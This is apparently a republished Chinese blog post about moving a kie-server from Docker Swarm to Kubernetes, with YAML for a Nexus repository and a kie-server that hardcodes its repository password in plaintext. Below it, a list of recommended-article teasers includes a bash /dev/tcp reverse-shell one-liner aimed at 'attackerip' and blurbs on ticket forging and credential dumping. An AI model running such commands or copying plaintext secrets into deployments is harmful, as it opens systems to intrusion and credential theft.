部署环境从docker swarm迁移到k8s后kie-server的发布方式变化(二)

2023-05-16

正如后来的考虑, 如果外接maven私库照理说是ok的, 这样去掉volume的设计整个流程更加的自动化标准化.
开搞

第一步先部署一个nexus

yaml文件如下:

apiVersion: v1
kind: Namespace
metadata:
  name: nexus

---

apiVersion: v1
kind: Service
metadata:
  labels:
    k8s-app: nexus
  name: nexus
  namespace: nexus
spec:
  type: NodePort
  ports:
    - port: 8081
      targetPort: 8081
      nodePort: 30003
  selector:
    k8s-app: nexus

---

apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    k8s-app: nexus
  name: nexus
  namespace: nexus
spec:
  replicas: 1
  revisionHistoryLimit: 10
  selector:
    matchLabels:
      k8s-app: nexus
  template:
    metadata:
      labels:
        k8s-app: nexus
    spec:
      nodeName: ltwwapp01
      containers:
        - name: nexus
          image: sonatype/nexus3
          imagePullPolicy: Always
          ports:
            - containerPort: 8081
              protocol: TCP
          env:
          # 冒号后面必须加空格
            - name: TZ
              value: "Asia/Shanghai"

注意这里加了环境变量, 是必须加空格的, 不然读取失败.
然后惯例,把oracle的jar包手动上传. 不赘述,怎么用之前的文章也说过

第二步,把要验证的项目deploy到nexus

然后把workbench里的项目 git clone到自己本地, 然后修改maven的setting.xml,主要是如下几处,之前应该也说过
在这里插入图片描述
然后执行 mvn deploy,jar就发布到远程库了
在这里插入图片描述

第三步 删掉原来的ks,新弄一个连接nexus的ks

kubectl delete namespace kie-server-alone
然后新的yaml如下

apiVersion: v1
kind: Namespace
metadata:
  name: kie-server-nexus

---

apiVersion: v1
kind: Service
metadata:
  labels:
    k8s-app: kie-server-nexus
  name: kie-server-nexus
  namespace: kie-server-nexus
spec:
  type: NodePort
  ports:
    - port: 8080
      targetPort: 8080
      nodePort: 30002
  selector:
    k8s-app: kie-server-nexus

---

apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    k8s-app: kie-server-nexus
  name: kie-server-nexus
  namespace: kie-server-nexus
spec:
  replicas: 1
  revisionHistoryLimit: 10
  selector:
    matchLabels:
      k8s-app: kie-server-nexus
  template:
    metadata:
      labels:
        k8s-app: kie-server-nexus
    spec:
      nodeName: ltwwapp01
       
      containers:
        - name: kie-server-nexus
          image: quay.io/kiegroup/kie-server-showcase:latest
          imagePullPolicy: Always
          ports:
            - containerPort: 8080
              protocol: TCP
          env:
            - name: KIE_MAVEN_REPO
              value: "http://172.16.251.151:30003/repository/maven-public/"
            - name: KIE_MAVEN_REPO_USER
              value: "admin"
            - name: KIE_MAVEN_REPO_PASSWORD
              value: "123456789admin"
            - name: TZ  
              value: "Asia/Shanghai"

然后进入这个全新的ks ,仅把ks xx.xml改了, 然后重启wildfly,
然后postman验证
在这里插入图片描述
完美.

这样就很好了,少掉维护volume, 所有pod统一使用nexus,后续的发布流程只需要正常的开发, mvn deploy自动把项目成果打包到nexus, 测试环境需要发布什么项目, 只需要进入到pod里修改xml, 重启下就ok了, 最后一步看似也不太好, 但其实集群发布这应该是最好的方式了, 因为如果发送put命令来发布, 哪个pod处理请求是个很难处理的事情, 特别是k8s和containerd不支持暂停 停止的概念.

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

部署环境从docker swarm迁移到k8s后kie-server的发布方式变化(二) 的相关文章

随机推荐

  • 白银票据原理制作与利用

    文章目录 原理 利用条件 利用前提 生成流程 获取服务账号HASH 获取域SID 获取域名 获取名称 制造票据 票据注入内存前后对比 总结 原理 白银票据是伪造的Silver Ticket ST 它可以让你访问服务器上的指定服务 但是不能访
  • Nestjs框架快速入门:安装与启动

    Nestjs框架快速入门 安装与启动 Nest 是构建高效可扩展的 Node js Web 应用程序的框架 Nest 默认使用JavaScript的超集TypeScript进行开发 环境准备 查看node和npm版本 node versio
  • mimikatz常见命令

    文章目录 1 mimikatz简介2 命令2 1 常用命令2 2 privilege debug2 3 sekurlsa logonpasswords 1 mimikatz简介 Mimikatz 是一款用于提取 Windows 系统中用户凭
  • 内网中快速定位域管理员

    文章目录 1 攻击手法 1 1 日志分析 1 2 会话分析 2 工具 2 1 psloggedon exe 2 1 1 简介 2 1 2 下载地址 2 1 3 用法 2 2 netview exe 2 2 1 简介 2 2 2 下载地址 2
  • 获取RDP凭据密码

    1 简介 1 1 RDP Windows 自带的远程桌面功能非常强大 并且被广泛使用 因此 获取远程桌面凭证可以为渗透测试中的横向移动提供有利条件 横向移动是指在已经渗透到网络内部的情况下 继续在网络内部渗透的过程 通过获取远程桌面凭证 攻
  • phpstudy小皮面板RCE漏洞_XSS盲打

    1 漏洞描述 最近爆出的phpstudy小皮面板存在RCE漏洞 xff0c 通过分析和复现发现是一个存储型xss漏洞导致的RCE xff0c 这是一个很简单的1click的RCE xff0c 通过系统登录用户名输入出的xss配合系统后台自动
  • 隧道技术之不出网-正向代理

    简介 很多情况下 xff0c 拿下一台主机不出网 xff0c 就没办法反向连接 xff0c 需要去正向连接 xff0c 这里用到一个工具正向代理工具Neo reGeorg 用法 第一步需要先设置一个密码 xff0c 假设我设置的为123 p
  • XXE外部实体引入漏洞原理及复现

    文章目录 1 简介2 XML基本语法2 1 文档声明2 2 根元素2 3 元素2 4 属性2 5 注释2 6 CDATA2 7 空元素 3 DTD基本语法3 1 要点3 2 DTD 示例 4 攻击5 防范 1 简介 XXE XML 外部实体
  • SSRF漏洞漏洞利用及防范

    文章目录 1 简介 2 攻击 2 1 1 DNSLOG 2 1 2 代码 3 防范 1 简介 SSRF Server Side Request Forgery 漏洞是一种 Web 应用程序安全漏洞 它允许攻击者构造非法请求并让 Web 服务
  • 渗透测试-信息收集之Google hacking + GitHub

    1 简介 Google hacking 是一种通过使用 Google 搜索引擎中的高级运算符来查找存储在网站上的敏感信息的技术 这可能包括登录凭据 敏感文件和其他敏感数据等信息 GitHub 信息收集是通过分析目标在 GitHub 平台上的
  • 反弹shell的命令大全

    bash gt bin bash i gt dev tcp attackerip 4444 0 lt amp 1 2 gt amp 1 gt bash i gt amp dev tcp attackerip 4444 0 gt amp 1
  • 水平/垂直越权攻击手段及实战

    文章目录 越权 1 水平越权 1 1 攻击流程 1 2 代码 1 3 实战 2 垂直越权 2 1 攻击流程 3 1 代码 越权 越权攻击 Privilege Escalation 是指攻击者通过利用系统漏洞 配置错误或其他安全漏洞等手段 从
  • MySQL常用的show语法

    MySQL show语法 SHOW BINARY LOGS SHOW BINARY LOGS 列出服务器上的二进制日志文件 SHOW BINLOG EVENTS 显示二进制日志中的事件 如果未指定 xff0c 则显示第一个二进制日志 mys
  • 渗透测试快速判断操作系统

    1 TTL TTL Time to Live 是一个IP数据包的字段 xff0c 用于限制在网络中传播的次数 它是一个8位字段 xff0c 表示数据包在网络中允许通过的路由数 每经过一个路由器 xff0c TTL就会减1 如果TTL为0 x
  • 实战中的.git信息泄露利用

    1 简介 其实这个是非常简单的哈 xff0c 但很多人看见 git不知道这个漏洞就放弃了 git文件夹是一种常见的源代码版本控制系统 xff08 如Git xff09 使用的文件夹 xff0c 用于跟踪文件和文件夹的更改 如果这个文 件夹被
  • 报错注入写shell

    文章目录 写shell条件 最常见的注入写shell方式 报错注入写shell 错误示范 lines starting by 失败原因 其他语法 lines terminated by 写入 fields terminated by 写入
  • oracle 删除主键

    删除主键一定要一起把索引删除 切记 span class token keyword alter span span class token keyword table span x span class token keyword dro
  • sql 取日期的年月日

    span class token keyword select span span class token keyword year span span class token punctuation span create time sp
  • 新专栏[飞控] 要开始学点新东西了.和第一步.硬件接线

    我淘宝买了便宜的无人机 stm32的板子 swd烧录接口 uart1串口通信 分两块 一块无人机 一块遥控器 无人机的板子不知上面俩接口 回去要看一下 下图是遥控器的这俩接口 SWD uart1 其中串口通信比较简单 可以直接连已经有的US
  • 部署环境从docker swarm迁移到k8s后kie-server的发布方式变化(二)

    正如后来的考虑 如果外接maven私库照理说是ok的 这样去掉volume的设计整个流程更加的自动化标准化 开搞 第一步先部署一个nexus yaml文件如下 apiVersion v1 kind Namespace metadata na